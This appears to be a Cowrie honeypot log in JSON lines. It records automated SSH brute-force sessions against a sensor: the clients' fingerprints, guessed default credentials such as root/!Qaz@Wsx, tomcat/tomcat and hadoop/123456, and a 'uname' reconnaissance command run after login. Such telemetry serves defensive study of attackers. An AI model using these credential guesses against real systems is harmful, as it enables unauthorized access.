{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:58.789511Z","src_ip":"212.227.235.229","session":"a90cbd05cd29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60448,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ce4404b8a77","protocol":"ssh","message":"New connection: 212.227.125.160:60448 (1.2.3.4:22) [session: 5ce4404b8a77]","sensor":"my-vps","timestamp":"2025-08-28T05:53:04.520295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:04.529949Z","src_ip":"212.227.125.160","session":"5ce4404b8a77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:04.626964Z","src_ip":"212.227.125.160","session":"5ce4404b8a77"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T05:53:05.045384Z","src_ip":"212.227.125.160","session":"5ce4404b8a77"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:06.153107Z","src_ip":"212.227.125.160","session":"5ce4404b8a77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58536,"dst_ip":"1.2.3.4","dst_port":22,"session":"536c1c6ed3cd","protocol":"ssh","message":"New connection: 212.227.235.229:58536 (1.2.3.4:22) [session: 536c1c6ed3cd]","sensor":"my-vps","timestamp":"2025-08-28T05:53:11.880991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:11.887558Z","src_ip":"212.227.235.229","session":"536c1c6ed3cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:12.024475Z","src_ip":"212.227.235.229","session":"536c1c6ed3cd"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T05:53:12.598364Z","src_ip":"212.227.235.229","session":"536c1c6ed3cd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:13.743303Z","src_ip":"212.227.235.229","session":"536c1c6ed3cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52124,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f8ff08a9fd3","protocol":"ssh","message":"New connection: 212.227.125.160:52124 (1.2.3.4:22) [session: 7f8ff08a9fd3]","sensor":"my-vps","timestamp":"2025-08-28T05:53:20.335301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:20.336475Z","src_ip":"212.227.125.160","session":"7f8ff08a9fd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:20.441456Z","src_ip":"212.227.125.160","session":"7f8ff08a9fd3"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:53:20.881597Z","src_ip":"212.227.125.160","session":"7f8ff08a9fd3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:21.988721Z","src_ip":"212.227.125.160","session":"7f8ff08a9fd3"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":33520,"dst_ip":"1.2.3.4","dst_port":23,"session":"25e059be1580","protocol":"telnet","message":"New connection: 8.222.212.69:33520 (1.2.3.4:23) [session: 25e059be1580]","sensor":"my-vps","timestamp":"2025-08-28T05:53:22.771778Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58968,"dst_ip":"1.2.3.4","dst_port":22,"session":"37714887e05b","protocol":"ssh","message":"New connection: 212.227.235.229:58968 (1.2.3.4:22) [session: 37714887e05b]","sensor":"my-vps","timestamp":"2025-08-28T05:53:27.878692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:27.879641Z","src_ip":"212.227.235.229","session":"37714887e05b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:28.024825Z","src_ip":"212.227.235.229","session":"37714887e05b"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:53:28.463502Z","src_ip":"212.227.235.229","session":"37714887e05b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:29.609696Z","src_ip":"212.227.235.229","session":"37714887e05b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42078,"dst_ip":"1.2.3.4","dst_port":22,"session":"c10b4b67afcc","protocol":"ssh","message":"New connection: 212.227.125.160:42078 (1.2.3.4:22) [session: c10b4b67afcc]","sensor":"my-vps","timestamp":"2025-08-28T05:53:34.593620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:34.641986Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:34.728638Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:53:35.135949Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:53:35.432183Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:53:35.432902Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:35.544982Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:35.546042Z","src_ip":"212.227.125.160","session":"c10b4b67afcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53942,"dst_ip":"1.2.3.4","dst_port":22,"session":"d514904d5097","protocol":"ssh","message":"New connection: 212.227.125.160:53942 (1.2.3.4:22) [session: d514904d5097]","sensor":"my-vps","timestamp":"2025-08-28T05:53:49.404532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:49.436668Z","src_ip":"212.227.125.160","session":"d514904d5097"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:49.551083Z","src_ip":"212.227.125.160","session":"d514904d5097"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:53:49.929563Z","src_ip":"212.227.125.160","session":"d514904d5097"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:51.037997Z","src_ip":"212.227.125.160","session":"d514904d5097"}
{"eventid":"cowrie.session.closed","duration":31.245882749557495,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:54.017581Z","src_ip":"8.222.212.69","session":"25e059be1580"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54026,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d32cd3b6846","protocol":"ssh","message":"New connection: 212.227.235.229:54026 (1.2.3.4:22) [session: 4d32cd3b6846]","sensor":"my-vps","timestamp":"2025-08-28T05:53:56.687524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:56.688408Z","src_ip":"212.227.235.229","session":"4d32cd3b6846"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:56.833426Z","src_ip":"212.227.235.229","session":"4d32cd3b6846"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38390,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dcee9d3026e","protocol":"ssh","message":"New connection: 212.227.235.229:38390 (1.2.3.4:22) [session: 5dcee9d3026e]","sensor":"my-vps","timestamp":"2025-08-28T05:53:57.229784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:53:57.230537Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:53:57.271365Z","src_ip":"212.227.235.229","session":"4d32cd3b6846"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:53:57.372798Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:53:57.807877Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:53:58.112945Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:53:58.113612Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:58.257189Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:58.258325Z","src_ip":"212.227.235.229","session":"5dcee9d3026e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:53:58.417855Z","src_ip":"212.227.235.229","session":"4d32cd3b6846"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54866,"dst_ip":"1.2.3.4","dst_port":22,"session":"88a71fecc1de","protocol":"ssh","message":"New connection: 212.227.125.160:54866 (1.2.3.4:22) [session: 88a71fecc1de]","sensor":"my-vps","timestamp":"2025-08-28T05:54:04.232349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:04.265244Z","src_ip":"212.227.125.160","session":"88a71fecc1de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:04.387613Z","src_ip":"212.227.125.160","session":"88a71fecc1de"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:04.762116Z","src_ip":"212.227.125.160","session":"88a71fecc1de"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:05.869082Z","src_ip":"212.227.125.160","session":"88a71fecc1de"}
